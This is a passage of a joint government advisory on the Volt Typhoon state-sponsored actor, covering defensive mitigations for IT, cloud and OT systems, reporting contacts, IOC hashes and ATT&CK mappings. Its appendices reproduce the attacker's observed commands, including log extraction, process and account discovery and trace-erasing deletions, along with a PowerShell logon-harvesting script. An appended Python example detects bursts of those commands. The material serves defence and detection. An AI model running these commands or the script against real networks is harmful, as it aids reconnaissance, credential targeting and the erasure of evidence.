Secure Sensitive Data

• Securely store sensitive data (including operational technology documentation, network diagrams, etc.), ensuring that only authenticated and authorized users can access the data.

Implement Network Segmentation

• Ensure that sensitive accounts use their administrator credentials only on hardened, secure computers. This practice can reduce lateral movement exposure within networks.
• Conduct comprehensive trust assessments to identify business-critical trusts and apply necessary controls to prevent unauthorized cross-forest/domain traversal.
• Harden federated authentication by enabling Security Identifier (SID) Filtering and Selective Authentication on AD trust relationships to further restrict unauthorized access across domain boundaries.
• Implement network segmentation to isolate federation servers from other systems and limit allowed traffic to systems and protocols that require access, in accordance with Zero Trust principles.

Secure Cloud Assets

• Harden cloud assets in accordance with vendor-provided or industry standard hardening guidance.
  ◦ Organizations with Microsoft cloud infrastructure, see CISA's Microsoft 365 Security Configuration Baseline Guides, which provide minimum viable secure configuration baselines for Microsoft Defender for Office 365, Azure Active Directory (now known as Microsoft Entra ID), Exchange Online, OneDrive for Business, Power BI, Power Platform, SharePoint Online, and Teams. For additional guidance, see the Australian Signals Directorate's Blueprint for Secure Cloud.
  ◦ Organizations with Google cloud infrastructure, see CISA's Google Workspace Security Configuration Baseline Guides, which provide minimum viable secure configuration baselines for Groups for Business, GMAIL, Google Calendar, Google Chat, Google Common Controls, Google Classroom, Google Drive and Docs, Google Meet, and Google Sites.
• Revoke unnecessary public access to the cloud environment. This involves reviewing and restricting public endpoints and ensuring that services like storage accounts, databases, and virtual machines are not publicly accessible unless absolutely necessary.
• Disable legacy authentication protocols across all cloud services and platforms. Legacy protocols frequently lack support for advanced security mechanisms such as multifactor authentication, rendering them susceptible to compromise. Instead, enforce the use of modern authentication protocols that support stronger security features like MFA, token-based authentication, and adaptive authentication measures. Enforce this practice through the use of Conditional Access Policies. These policies can initially be run in report-only mode to identify potential impacts and plan mitigations before fully enforcing them. This approach allows organizations to systematically control access to their cloud resources, significantly reducing the risk of unauthorized access and potential compromise.
• Regularly monitor and audit privileged cloud-based accounts, including service accounts, which are frequently abused to enable broad cloud resource access and persistence.

Be Prepared

• Ensure logging is turned on for application, access, and security logs (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and VPNs) [CPG 2T]. Given Volt Typhoon's use of LOTL techniques and their significant dwell time, application event logs may be a valuable resource to hunt for Volt Typhoon activity because these logs typically remain on endpoints for relatively long periods of time.
  ◦ For OT assets where logs are non-standard or not available, collect network traffic and communications between those assets and other assets.
• Implement file integrity monitoring (FIM) tools to detect unauthorized changes.
• Store logs in a central system, such as a security information and event management (SIEM) tool or central database. Ensure the logs can only be accessed or modified by authorized and authenticated users [CPG 2U].
  ◦ Store logs for a period informed by risk or pertinent regulatory guidelines.
  ◦ Tune log alerting to reduce noise while ensuring there are alerts for high-risk activities. (For information on alert tuning, see the joint guide Identifying and Mitigating Living Off the Land Techniques.)
• Establish and continuously maintain a baseline of installed tools and software, account behavior, and network traffic. This way, network defenders can identify potential outliers, which may indicate malicious activity. Note: For information on establishing a baseline, see the joint guide Identifying and Mitigating Living off the Land Techniques.
• Document a list of threats and cyber actor TTPs relevant to your organization (e.g., based on industry or sectors), and maintain the ability (such as via rules, alerting, or commercial prevention and detection systems) to detect instances of those key threats [CPG 3A].
• Implement periodic training for all employees and contractors that covers basic security concepts (such as phishing, business email compromise, basic operational security, password security, etc.), as well as fostering an internal culture of security and cyber awareness [CPG 2I].
  ◦ Tailor the training to network IT personnel/administrators and other key staff based on relevant organizational cyber threats and TTPs, such as Volt Typhoon. For example, communicate that Volt Typhoon actors are known to target personal email accounts of IT staff, and encourage staff to protect their personal email accounts by using strong passwords and implementing MFA.
  ◦ In addition to basic cybersecurity training, ensure personnel who maintain or secure OT as part of their regular duties receive OT-specific cybersecurity training on at least an annual basis [CPG 2J].
  ◦ Educate users about the risks associated with storing unprotected passwords.

OT Administrators and Defenders

• Change default passwords [CPG 2A] and ensure they meet the policy requirements for complexity. If the asset's password cannot be changed, implement compensating controls for the device; for example, segment the device into separate enclaves and implement increased monitoring and logging.
  ◦ Require that passwords for all OT password-protected assets be at least 15 characters, when technically feasible. In instances where minimum password lengths are not technically feasible (for example, assets in remote locations), apply compensating controls, record the controls, and log all login attempts [CPG 2B].
  ◦ Enforce strict access policies for accessing OT networks. Develop strict operating procedures for OT operators that detail secure configuration and usage.
• Segment OT assets from IT environments by [CPG 2F]:
  ◦ Denying all connections to the OT network by default unless explicitly allowed (e.g., by IP address and port) for specific system functionality.
  ◦ Requiring necessary communications paths between IT and OT networks to pass through an intermediary, such as a properly configured firewall, bastion host, "jump box," or a demilitarized zone (DMZ), which is closely monitored, captures network logs, and only allows connections from approved assets.
  ◦ Closely monitoring all connections into OT networks for misuse, anomalous activity, or OT protocols.
• Monitor for unauthorized controller change attempts. Implement integrity checks of controller process logic against a known good baseline. Ensure process controllers are prevented from remaining in remote program mode while in operation, if possible.
• Lock or limit set points in control processes to reduce the consequences of unauthorized controller access.
• Be prepared by:
  ◦ Determining your critical operational processes' reliance on key IT infrastructure:
    ▪ Maintain and regularly update an inventory of all organizational OT assets.
    ▪ Understand and evaluate cyber risk on "as-operated" OT assets.
    ▪ Create an accurate "as-operated" OT network map and identify OT and IT network inter-dependencies.
  ◦ Identifying a resilience plan that addresses how to operate if you lose access to or control of the IT and/or OT environment.
    ▪ Plan for how to continue operations if a control system is malfunctioning, inoperative, or actively acting contrary to the safe and reliable operation of the process.
    ▪ Develop workarounds or manual controls to ensure ICS networks can be isolated if the connection to a compromised IT environment creates risk to the safe and reliable operation of OT processes.
  ◦ Creating and regularly exercising an incident response plan.
    ▪ Regularly test manual controls so that critical functions can be kept running if OT networks need to be taken offline.
  ◦ Implementing regular data backup procedures on OT networks.
    ▪ Regularly test backup procedures.
  ◦ Following risk-informed guidance in the joint advisory NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems and the NSA advisory Stop Malicious Cyber Activity Against Connected Operational Technology.

CONTACT INFORMATION

US organizations: To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact:
• CISA's 24/7 Operations Center at Report@cisa.gov or 1-844-Say-CISA (1-844-729-2472), or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
• For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
• Water and Wastewater Systems Sector organizations, contact the EPA Water Infrastructure and Cyber Resilience Division at watercyberta@epa.gov to voluntarily provide situational awareness.
• Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact EnergySRMA@hq.doe.gov.
• For transportation entities regulated by TSA, report to CISA Central in accordance with the requirements found in applicable Security Directives, Security Programs, or TSA Order.

Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.

New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.

United Kingdom organizations: Report a significant cyber security incident at ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:
1. Select an ATT&CK technique described in this advisory (see Table 5 through Table 17).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies' performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

[1] fofa
[2] Microsoft: Volt Typhoon targets US critical infrastructure with living-off-the-land techniques
[3] GitHub – fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet
[4] GitHub – sandialabs/gait: Zeek Extension to Collect Metadata for Profiling of Endpoints and Proxies
[5] The Zeek Network Security Monitor

RESOURCES

• Microsoft: Volt Typhoon targets US critical infrastructure with living-off-the-land techniques
• Secureworks: Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations

DISCLAIMER

The information in this report is being provided "as is" for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.

ACKNOWLEDGEMENTS

Fortinet and Microsoft contributed to this advisory.

VERSION HISTORY

February 7, 2024: Initial Version.
March 7, 2024: Updated Mitigations section to add recommendation on "end of life" technology.

APPENDIX A: VOLT TYPHOON OBSERVED COMMANDS / LOTL ACTIVITY

See Table 2 and Table 3 for Volt Typhoon commands and PowerShell scripts observed by the U.S. authoring agencies during incident response activities. For additional commands used by Volt Typhoon, see the joint advisory People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection.

Table 2: Volt Typhoon Observed Commands in PowerShell Console History
(each entry gives the command/script, followed by its description/use)

Get-EventLog security -instanceid 4624 -after {redacted date} | fl * | Out-File 'C:\users\public\documents\user.dat'
    PowerShell command that extracts security log entries with Event ID 4624 after a specified date. The output is formatted (fl *) and saved to user.dat. Potentially used to analyze logon patterns and identify potential targets for lateral movement.

Get-EventLog security -instanceid 4624 | Where-Object {$_.message.contains('{redacted user account}')} | select -First 1 | fl *
    PowerShell command that extracts security log entries with Event ID 4624 and filters them to include only those containing a specific user account, selecting the first instance of such an event.
wminc process get name,processid
    Appears to be an attempt to use the wmic command but with a misspelling (wminc instead of wmic). This command, as it stands, would not execute successfully and would return an error in a typical Windows environment. This could indicate a mistake made during manual input.

wmic process get name,processid
    WMI command that lists all running processes with process names and process IDs. Potentially used to find process IDs needed for other operations, like memory dumping.

tasklist /v
    Displays detailed information about currently running processes, including the name, PID, session number, and memory usage.

taskkill /f /im rdpservice.exe
    Forcibly terminates the process rdpservice.exe. Potentially used as a cleanup activity post-exploitation.

ping -n 1 {redacted IP address}
    Sends one ICMP echo request to a specified IP address.

ping -n 1 -w 1 {redacted IP address}
    Sends one ICMP echo request to a specified IP address with a timeout (-w) of 1 millisecond.

net user
    Lists all user accounts on the local machine or domain, useful for quickly viewing existing user accounts.

quser
query user
    Displays information about user sessions on a system, aiding in identifying active users or sessions.

net start
    Lists all active services.

cmd
    Opens a new instance of the command prompt.

cd [Redacted Path]
    Changes the current directory to a specified path, typically for navigating file systems.

Remove-Item .\Thumbs.db
    PowerShell command to delete the Thumbs.db file, possibly for cleanup or removing traces.

move .\Thumbs.db ttt.dat
    Relocates and renames the file Thumbs.db in the current directory to ttt.dat within the same directory.

del .\Thumbs.db /f /s /q
    Force deletes Thumbs.db files from the current directory and all subdirectories, part of cleanup operations to erase traces.

del ??
    Deletes files with two-character names, potentially a targeted cleanup command.

del /?
    Displays help information for the del command.
exit
    Terminates the command prompt session.

ipconfig
    Retrieves network configuration details, helpful for discovery and mapping the victim's network.

net time /dom
    Queries or sets the network time for a domain, potentially used for reconnaissance or to manipulate system time.

netstta -ano
    Intended as netstat -ano; a mistyped command indicating a potential operational error.

netstat -ano
    Lists active network connections and processes, helpful for identifying communication channels and potential targets.

type .\Notes.txt
    Displays the contents of Notes.txt, possibly used for extracting specific information or intelligence gathering.

logoff
    Logs off the current user session.

Table 3: Volt Typhoon Observed PowerShell Scripts

Script name and location: C:\{redacted}\logins.ps1

Contents:

    # Find DC list from Active Directory
    $DCs = Get-ADDomainController -Filter *

    # Define time for report (default is 1 day)
    $startDate = (get-date).AddDays(-1)

    # Store successful logon events from security logs with the specified dates and workstation/IP in an array
    foreach ($DC in $DCs){
      $slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname -after $startDate | where {$_.eventID -eq 4624 }
    }

    # Crawl through events; print all logon history with type, date/time, status, account name, computer and IP address if user logged on remotely
    foreach ($e in $slogonevents){
      # Logon Successful Events
      # Local (Logon Type 2)
      if (($e.EventID -eq 4624 ) -and ($e.ReplacementStrings[8] -eq 2)){
        write-host "Type: Local Logon`tDate: "$e.TimeGenerated "`tStatus: Success`tUser: "$e.ReplacementStrings[5] "`tWorkstation: "$e.ReplacementStrings[11]
      }
      # Remote (Logon Type 10)
      if (($e.EventID -eq 4624 ) -and ($e.ReplacementStrings[8] -eq 10)){
        write-host "Type: Remote Logon`tDate: "$e.TimeGenerated "`tStatus: Success`tUser: "$e.ReplacementStrings[5] "`tWorkstation: "$e.ReplacementStrings[11] "`tIP Address: "$e.ReplacementStrings[18]
      }
    }

Description/Use: The script is designed for user logon discovery in a Windows Active Directory environment. It retrieves a list of DCs and then queries security logs on these DCs for successful logon events (Event ID 4624) within the last day. The script differentiates between local (Logon Type 2) and remote (Logon Type 10) logon events. For each event, it extracts and displays details including the logon type, date/time of logon, status, account name, and the workstation or IP address used for the logon. Volt Typhoon may be leveraging this script to monitor user logon activities across the network, potentially to identify patterns, gather credentials, or track the movement of users and administrators within the network.

APPENDIX B: INDICATORS OF COMPROMISE

See Table 4 for Volt Typhoon IOCs obtained by the U.S. authoring agencies during incident response activities. Note: See MAR-10448362-1.v1 for more information on this malware.

Table 4: Volt Typhoon Malicious Files and Associated Hashes

File Name: BrightmetricAgent.exe
  Description: The file is an FRP that could be used to reveal servers situated behind a network firewall or obscured through Network Address Translation (NAT).
  MD5: fd41134e8ead1c18ccad27c62a260aa6
  SHA256: edc0c63065e88ec96197c8d7a40662a15a812a9583dc6c82b18ecd7e43b13b70

File Name: SMSvcService.exe
  Description: The file is a Windows executable "FRPC" designed to open a reverse proxy between the compromised system and the threat actor(s) C2 server.
  MD5: b1de37bf229890ac181bdef1ad8ee0c2
  SHA256: 99b80c5ac352081a64129772ed5e1543d94cad708ba2adc46dc4ab7a0bd563f1

APPENDIX C: MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 5 through Table 17 for all referenced threat actor tactics and techniques in this advisory.

Table 5: Volt Typhoon actors ATT&CK Techniques for Enterprise – Reconnaissance

Technique Title | ID | Use
Gather Victim Host Information | T1592 | Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators.
Gather Victim Identity Information | T1589 | Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization's staff.
Gather Victim Identity Information: Email Addresses | T1589.002 | Volt Typhoon targets the personal emails of key network and IT staff.
Gather Victim Network Information | T1590 | Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization's network.
Gather Victim Org Information | T1591 | Volt Typhoon conducts extensive pre-compromise reconnaissance to learn about the target organization.
Search Open Websites/Domains | T1593 | Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators.
Search Victim-Owned Websites | T1594 | Volt Typhoon conducts extensive pre-compromise reconnaissance. This includes web searches, including victim-owned sites, for victim host, identity, and network information, especially for information on key network and IT administrators.

Table 6: Volt Typhoon actors ATT&CK Techniques for Enterprise – Resource Development

Technique Title | ID | Use
Acquire Infrastructure: Botnet | T1583.003 | Volt Typhoon uses multi-hop proxies for command-and-control infrastructure. The proxy is typically composed of Virtual Private Servers (VPSs) or small office/home office (SOHO) routers.
Compromise Infrastructure: Botnet | T1584.005 | Volt Typhoon used Cisco and NETGEAR end-of-life SOHO routers implanted with KV Botnet malware to support their operations.
Compromise Infrastructure: Server T1584.004 Volt Typhoon has redirected specific port traffic to their proxy infrastructure, effectively converting the PRTG’s Detection Guidance server into a proxy for their C2 traffic. Develop Capabilities: Exploits T1587.004 Volt Typhoon uses publicly available exploit code, but is also adept at discovering and exploiting vulnerabilities as zero days. Obtain Capabilities: Exploits T1588.005 Volt Typhoon uses publicly available exploit code, but is also adept at discovering and exploiting vulnerabilities as zero days. Table 7: Volt Typhoon actors ATT&CK Techniques for Enterprise – Initial Access Initial Access     Technique Title ID Use Exploit Public-Facing Application T1190 Volt Typhoon commonly exploits vulnerabilities in networking appliances such as Fortinet, Ivanti (formerly Pulse Secure), NETGEAR, Citrix, and Cisco. External Remote Services T1133 Volt Typhoon often uses VPN sessions to securely connect to victim environments, enabling discreet follow-on intrusion activities. Table 8: Volt Typhoon actors ATT&CK Techniques for Enterprise – Execution Execution     Technique Title ID Use Command and Scripting Interpreter T1059 Volt Typhoon uses hands-on-keyboard execution for their malicious activity via the command-line. Command and Scripting Interpreter: PowerShell T1059.001 Volt Typhoon has executed clients via PowerShell. Command and Scripting Interpreter: Unix Shell T1059.004 Volt Typhoon has used Brightmetricagent.exe, which contains multiplexer libraries that can bi-directionally stream data over through NAT networks and contains a command-line interface (CLI) library that can leverage command shells such as PowerShell, Windows Management, Instrumentation (WMI), and Z Shell (zsh). Windows Management Instrumentation T1047 Volt Typhoon has used Windows Management Instrumentation Console (WMIC) commands. 
Table 9: Volt Typhoon actors ATT&CK Techniques for Enterprise – Persistence Persistence     Technique Title ID Use Valid Accounts T1078 Volt Typhoon primarily relies on valid credentials for persistence. Table 10: Volt Typhoon actors ATT&CK Techniques for Enterprise – Privilege Escalation Privilege Escalation     Technique Title ID Use Exploitation for Privilege Escalation T1068 Volt Typhoon first obtains credentials from public-facing appliances after gaining initial access by exploiting privilege escalation vulnerabilities in the operating system or network services. Table 11: Volt Typhoon actors ATT&CK Techniques for Enterprise – Defense Evasion Defense Evasion     Technique Title ID Use Direct Volume Access T1006 Volt Typhoon has executed the Windows-native vssadmin command to create a volume shadow copy. Indicator Removal: Clear Persistence T1070.009 Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names. Indicator Removal: Clear Windows Event Logs T1070.001 Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names. Indicator Removal: File Deletion T1070.004 Volt Typhoon created systeminfo.dat in C:\Users\Public\Documents, but subsequently deleted it. Masquerading: Match Legitimate Name or Location T1036.005 Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names. Modify Registry T1112 Volt Typhoon has used the netsh command, a legitimate Windows command, to create a PortProxy registry modification on the PRTG server. 
Obfuscated Files or Information: Software Packing T1027.002 Volt Typhoon has obfuscated FRP client files (BrightmetricAgent.exe and SMSvcService.exe) and the command-line port scanning utility ScanLine by packing the files with Ultimate Packer for Executables (UPX). System Binary Proxy Execution T1218 Volt Typhoon uses hands-on-keyboard activity via the command-line and use other native tools and processes on systems (often referred to as “LOLBins”), known as LOTL, to maintain and expand access to the victim networks. Table 12: Volt Typhoon actors ATT&CK Techniques for Enterprise – Credential Access Credential Access     Technique Title ID Use Brute Force: Password Cracking T1110.002 Volt Typhoon has exfiltrated NTDS.dit and SYSTEM registry hive to crack passwords offline. Credentials from Password Stores T1555 Volt Typhoon has installed browsers saved passwords history, credit card details, and cookies. Credentials from Password Stores: Credentials from Web Browsers T1555.003 Volt Typhoon has strategically targeted network administrator web browser data, focusing on both browsing history and stored credentials. OS Credential Dumping: LSASS Memory T1003.001 Volt Typhoon used a DLL with MiniDump and the process ID of Local Security Authority Subsystem Service (LSASS) to dump the LSASS process memory and obtain credentials. OS Credential Dumping: NTDS T1003.003 Volt Typhoon appears to prioritize obtaining valid credentials by extracting the Active Directory database file (NTDS.dit). Unsecured Credentials T1552 Volt Typhoon has obtained credentials insecurely stored on an appliance. Unsecured Credentials: Private Keys T1552.004 Volt Typhoon has accessed a Local State file that contains the Advanced Encryption Standard (AES) encryption key used to encrypt the passwords stored in the Chrome browser, which enables the actors to obtain plaintext passwords stored in the Login Data file in the Chrome browser. 
Table 13: Volt Typhoon actors ATT&CK Techniques for Enterprise – Discovery Discovery     Technique Title ID Use Account Discovery: Local Account T1087.001 Volt Typhoon executed net user and quser for user account information. Application Window Discovery T1010 Volt Typhoon created and accessed a file named rult3uil.log on a Domain Controller in C:\Windows\System32\. The rult3uil.log file contained user activities on a compromised system, showcasing a combination of window title information and focus shifts, keypresses, and command executions across Google Chrome and Windows PowerShell, with corresponding timestamps. Browser Information Discovery T1217 Volt Typhoon has installed browsers saved passwords history, credit card details, and cookies. File and Directory Discovery T1083 Volt Typhoon enumerated several directories​, including directories containing vulnerability testing and cyber related content and facilities data, such as construction drawings. Log Enumeration T1654 Volt Typhoon has captured successful logon events. Network Service Discovery T1046 Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery. Peripheral Device Discovery T1120 Volt Typhoon has obtained the victim’s system screen dimension and display devices information. Permission Groups Discovery T1069 Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery. Process Discovery T1057 Volt Typhoon executed tasklist /v to gather a detailed process listing. Query Registry T1012 Volt Typhoon has interacted with a PuTTY application by enumerating existing stored sessions. Software Discovery T1518 Volt Typhoon has obtained the victim’s list of applications installed on the victim’s system. 
System Information Discovery T1082 Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery. System Location Discovery T1614 Volt Typhoon has obtained the victim’s system current locale. System Network Configuration Discovery: Internet Connection Discovery T1016.001 Volt Typhoon employs ping with various IP addresses to check network connectivity and net start to list running services. System Owner/User Discovery T1033 Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery. System Service Discovery T1007 Volt Typhoon employs ping with various IP addresses to check network connectivity and net start to list running services. System Time Discovery T1124 Volt Typhoon has obtained the victim’s system timezone. Table 14: Volt Typhoon actors ATT&CK Techniques for Enterprise – Lateral Movement Lateral Movement     Technique Title ID Use Remote Service Session Hijacking T1563 Volt Typhoon potentially had access to a range of critical PuTTY profiles, including those for water treatment plants, water wells, an electrical substation, operational technology systems, and network security devices. This would enable them to access these critical systems. Remote Services: Cloud Services T1021.007 During the period of Volt Typhoon’s known network presence, there were anomalous login attempts to an Azure tenant potentially using credentials previously compromised from theft of NTDS.dit. Remote Services: Remote Desktop Protocol T1021.001 Volt Typhoon has moved laterally to the Domain Controller via an interactive RDP session using a compromised account with domain administrator privileges. Use Alternate Authentication Material T1550 Volt Typhoon may be capable of using other methods such as Pass the Hash or Pass the Ticket for lateral movement. 
Valid Accounts: Cloud Accounts T1078.004 During the period of Volt Typhoon’s known network presence, there were anomalous login attempts to an Azure tenant potentially using credentials previously compromised from theft of NTDS.dit. Table 15: Volt Typhoon actors ATT&CK Techniques for Enterprise – Collection Collection     Technique Title ID Use Archive Collected Data T1560 Volt Typhoon collected sensitive information obtained from a file server in multiple zipped files. Archive Collected Data: Archive via Utility T1560.001 Volt Typhoon has compressed and archived the extracted ntds.dit and accompanying registry files (by executing ronf.exe, which was likely a renamed version of rar.exe). Data Staged T1074 Volt Typhoon accessed the file C:\Users\{redacted}\Downloads\History.zip, which presumably contained data from the User Data directory of the user’s Chrome browser, which the actors likely saved in the Downloads directory for exfiltration. Screen Capture T1113 Volt Typhoon has obtained a screenshot of the victim’s system using two libraries (gdi32.dll and gdiplus.dll) Table 16: Volt Typhoon actors ATT&CK Techniques for Enterprise – Command and Control Command and Control     Technique Title ID Use Encrypted Channel T1573 Volt Typhoon has setup FRP clients on a victim’s corporate infrastructure to establish covert communications channels for command and control. Ingress Tool Transfer T1105 Volt Typhoon uses legitimate, but outdated versions of network admin tools. For example, in one confirmed compromise, actors downloaded an outdated version of comsvcs.dll, on the DC in a non-standard folder. Proxy T1090 Volt Typhoon has setup FRP clients on a victim’s corporate infrastructure to establish covert communications channels for command and control. Proxy: Internal Proxy T1090.001 Volt Typhoon has used the netsh command, a legitimate Windows command, to create a PortProxy registry modification on the PRTG server. 
Proxy: Multi-hop Proxy T1090.003 Volt Typhoon uses multi-hop proxies for command-and-control infrastructure. Table 17: Volt Typhoon actors ATT&CK Techniques for Enterprise – Exfiltration Exfiltration     Technique Title ID Use Exfiltration Over Alternative Protocol T1048 Volt Typhoon exfiltrated files via Server Message Block (SMB).
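The command lines in Table 2 and the Discovery techniques in Table 13 are individually benign, so the detection opportunity is their clustering: one account on one host running several of them within minutes, including the mistyped ones that betray a keyboard operator. The following added example (not part of the advisory; hostnames, accounts, timestamps and the IP address are constructed) scores process-creation records against those command prefixes and alerts on such a burst.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Command-line prefixes taken from Table 2, mapped to what they reveal.
DISCOVERY = {
    "wmic process get": "process listing", "tasklist": "process listing",
    "net user": "account listing", "quser": "session listing",
    "query user": "session listing", "net start": "service listing",
    "ipconfig": "network configuration", "netstat -ano": "active connections",
    "net time": "domain time", "ping -n 1": "connectivity probe",
}
# Mistyped tool names seen in Table 2: a scheduled script never misspells
# a tool, so a typo of a discovery command points to a keyboard operator.
TYPOS = {"wminc", "netstta"}

def classify(cmdline):
    """Return a discovery category for one command line, else None."""
    parts = cmdline.lower().split() or [""]
    # Drop any directory and .exe suffix from the program token.
    parts[0] = parts[0].rsplit("\\", 1)[-1].removesuffix(".exe")
    if parts[0] in TYPOS:
        return "mistyped discovery command"
    normalized = " ".join(parts)
    for prefix, label in DISCOVERY.items():
        if normalized.startswith(prefix):
            return label
    return None

def find_bursts(events, window=timedelta(minutes=10), min_categories=4):
    """events: (iso_time, host, account, cmdline) tuples. Alert when one
    account on one host covers >= min_categories distinct discovery
    categories inside `window`. Returns [(host, account, start, cats)]."""
    hits = defaultdict(list)
    for iso_time, host, account, cmdline in events:
        label = classify(cmdline)
        if label:
            hits[(host, account)].append((datetime.fromisoformat(iso_time), label))
    alerts = []
    for (host, account), seen in hits.items():
        seen.sort()
        for start, _ in seen:
            cats = {lbl for t, lbl in seen if start <= t <= start + window}
            if len(cats) >= min_categories:
                alerts.append((host, account, start.isoformat(), sorted(cats)))
                break  # one alert per host/account is enough
    return alerts

# Constructed sample (hostnames, accounts and IP are invented): a routine
# helpdesk check that should stay quiet, and a Table 2-style burst on a DC.
SAMPLE_EVENTS = [
    ("2024-02-07T08:00:00", "WS17", "helpdesk", "ipconfig /all"),
    ("2024-02-07T08:01:00", "WS17", "helpdesk", "ping -n 1 10.0.0.1"),
    ("2024-02-07T02:10:00", "DC01", "svc_backup", "wminc process get name,processid"),
    ("2024-02-07T02:10:20", "DC01", "svc_backup", "wmic process get name,processid"),
    ("2024-02-07T02:11:05", "DC01", "svc_backup", "tasklist /v"),
    ("2024-02-07T02:12:40", "DC01", "svc_backup", "net user"),
    ("2024-02-07T02:15:00", "DC01", "svc_backup", "netstat -ano"),
    ("2024-02-07T02:16:30", "DC01", "svc_backup", "net time /dom"),
]
```

Calling `find_bursts(SAMPLE_EVENTS)` yields one alert for DC01/svc_backup spanning five categories, while the two helpdesk commands stay below the threshold; tune `window` and `min_categories` against the baseline of your own administrators' routine activity.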